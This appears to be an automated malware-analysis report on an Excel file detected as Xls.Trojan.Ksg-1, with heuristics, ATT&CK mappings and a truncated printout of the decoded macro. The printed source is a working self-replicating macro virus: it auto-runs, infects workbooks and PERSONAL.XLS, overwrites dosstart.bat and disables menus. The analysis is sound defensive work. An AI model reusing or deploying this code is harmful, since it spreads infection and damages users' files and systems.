Verdict: MALICIOUS
Risk Score: 380
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The file is identified as malicious by ClamAV (signature Xls.Trojan.Ksg-1). It contains an AutoOpen VBA macro that uses Shell() and CreateObject() calls, indicating an attempt to execute arbitrary code. The macro is obfuscated and structured as an auto-executing loader, strongly suggesting it downloads and executes a second-stage payload.
Heuristics (7)
- ClamAV: Xls.Trojan.Ksg-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Trojan.Ksg-1
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26871 bytes |

SHA-256: d949ef6044335fe09aba4da718e5cc6a9cf4405c63eba64585258ec283686581
Detection (ClamAV): Xls.Trojan.Ksg-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Foglio3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' ----------------------------------------------------------------------------------------
' This is parasite excel macro
' (c) 1999 by ksg
' astigmatiZm virus group
' www.astigmatiZm.cjb.net
' rename this file to parasite.bas and import it in MS Excel Visual Basic Editor to activate
' ----------------------------------------------------------------------------------------
Sub AutoOpen()
Application.OnSheetActivate = "parasite"
Call Mail
End Sub
Sub parasite()
On Error Resume Next
vname = "parasite"
dwb = "PERSONAL.XLS"
dvp = Application.StartupPath & "\" & dwb
counter1 = 0
counter2 = 0
With Application
.ScreenUpdating = False
.DisplayAlerts = False
.EnableCancelKey = xlDisabled
End With
Set cb = CommandBars: Set crtl = Controls
cb("Tools").ctrl(10).Delete: cb("Tools").ctrl(12).Delete
cb("View").ctrl(3).Delete: cb("Window").ctrl(3).Delete
cb("Window").ctrl(4).Delete
Call Poly
Randomize
If Int((Rnd * 10) + 1) = 10 Then
Application.Caption = "Microsoft Parasite 2000"
Application.StatusBar = "You have unleashed the parasite"
Open "c:\windows\dosstart.bat" For Output Access Write As 1
Print #1, "@ECHO OFF"
Print #1, "ECHO ---------------------------------"
Print #1, "ECHO You have unleashed the parasite "
Print #1, "ECHO ---------------------------------"
Print #1, "ECHO (c) 2000 k s g [astigmatiZm] "
Print #1, "ECHO ---------------------------------"
Close 1
End If
If Month(Now) = 9 And Day(Now) = 10 Then Call hidetb
If Month(Now) = 9 And Day(Now) = 11 Then Call showtb
Application.VBE.ActiveVBProject.VBComponents.Item(vname).Export "C:\progra~1\parasite.sys"
If Dir(dvp) = dwb Then counter2 = 1
For x = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(x).Name = vname Then counter1 = 1
Next x
If counter1 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import "C:\progra~1\parasite.sys"
ActiveWorkbook.Save
End If
If counter2 = 0 Then
Workbooks.Add.SaveAs FileName:=dvp
ActiveWorkbook.VBProject.VBComponents.Import "C:\progra~1\parasite.sys"
ActiveWindow.Visible = False
Workbooks(dwb).Save
End If
End Sub
Sub hidetb()
On Error Resume Next
CommandBars("Edit").Enabled = False: CommandBars("Insert").Enabled = False
CommandBars("File").Enabled = False: CommandBars("Tools").Enabled = False
End Sub
Sub showtb()
On Error Resume Next
CommandBars("Edit").Enabled = True: CommandBars("Insert").Enabled = True
CommandBars("File").Enabled = True: CommandBars("Tools").Enabled = True
End Sub
Sub ViewVBCode()
MsgBox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(118) + Chr(101) + Chr(114) + Chr(115) + Chr(105) + Chr(111) + Chr(110) + Chr(32) + Chr(111) + Chr(102) + Chr(32) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr
... (truncated)